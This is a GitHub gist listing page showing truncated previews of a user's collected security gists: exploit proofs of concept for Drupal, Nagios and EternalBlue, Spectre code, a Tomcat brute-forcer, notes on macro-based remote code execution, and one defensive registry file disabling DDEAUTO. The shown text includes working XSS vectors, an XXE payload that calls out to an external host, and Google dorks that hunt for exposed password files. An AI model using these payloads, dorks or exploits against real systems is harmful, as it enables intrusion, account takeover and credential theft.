Skip to content

Instantly share code, notes, and snippets.

Yunus YILDIRIM th3gundy

Block or report user

Report or block th3gundy

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View cve-2019-6340.py
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit is available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@th3gundy
th3gundy / spectre.c
Created Jan 5, 2018 — forked from ErikAugust/spectre.c
Spectre example code
View spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@th3gundy
th3gundy / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@th3gundy
th3gundy / tomcat_bruteforce.py
Created Nov 2, 2017 — forked from itsecurityco/tomcat_bruteforce.py
Tomcat manager console bruteforce
View tomcat_bruteforce.py
"""
Tomcat bruteforce
Author: @itsecurityco
"""
import os
import sys
import getopt
import base64
import requests
@th3gundy
th3gundy / disable_ddeauto.reg
Created Oct 23, 2017 — forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
View disable_ddeauto.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@th3gundy
th3gundy / Various-Macro-Based-RCEs.md
Created Aug 24, 2017 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
View Various-Macro-Based-RCEs.md

This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@th3gundy
th3gundy / nagios_cmd_injection.py
Created Aug 7, 2017 — forked from xl7dev/nagios_cmd_injection.py
Nagios Exploit Command Injection CVE-2016-9565
View nagios_cmd_injection.py
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@th3gundy
th3gundy / GoogleHackMasterList.txt
Created May 28, 2017 — forked from cmartinbaughman/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
View GoogleHackMasterList.txt
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www&#8221; domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@th3gundy
th3gundy / eternalblue8_exploit.py
Created May 18, 2017 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
View eternalblue8_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
You can’t perform that action at this time.